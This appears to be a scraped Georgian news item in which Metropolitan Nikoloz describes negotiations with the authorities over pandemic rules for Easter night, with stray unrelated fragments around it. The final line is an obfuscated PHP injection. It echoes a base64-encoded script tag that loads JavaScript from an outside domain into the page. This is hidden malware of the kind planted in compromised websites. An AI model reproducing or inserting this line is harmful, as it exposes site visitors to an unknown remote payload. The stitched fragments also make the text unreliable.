celsiusi
ავერსი შნაიდერი
მეუფე ნიკოლოზის განცხადებით, აღდგომის ღამეს რეგულაციებთან დაკავშირებით, ხელისუფლებასთან მოლაპარაკებები მიმდინარეობს.
 
მისი თქმით, მოლაპარაკებები ეხება იმას, რომ "არც მწვადი დაიწვას და არც შამფური".
 
"მიმდინარეობს მოლაპარაკება ხელისუფლებასთან, რომ მაქსიმალურად იქნას გათვალისწინებული პანდემიის გამო ჯანდაცვის მოთხოვნები და მეორე მხრივ, გათვალისწინებული იყოს ხალხის ინტერესი, რადგან ბევრი ადამიანია, ვისაც მოსვლის სურვილი აქვს", - აღნიშნავს მეუფე ნიკოლოზი.
 
კითხვაზე, კონკრეტულად, რას ეხება მოლაპარაკებები, მეუფე ნიკოლოზი აღნიშნავს -"ეხება იმას, რომ არც მწვადი დავწვათ და არც შამფური, ანუ არც ეპიდემია გავამძვინვაროთ და არც ადამიანები ჩავაგდოთ სასოწარკვეთილებაში."
1312
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");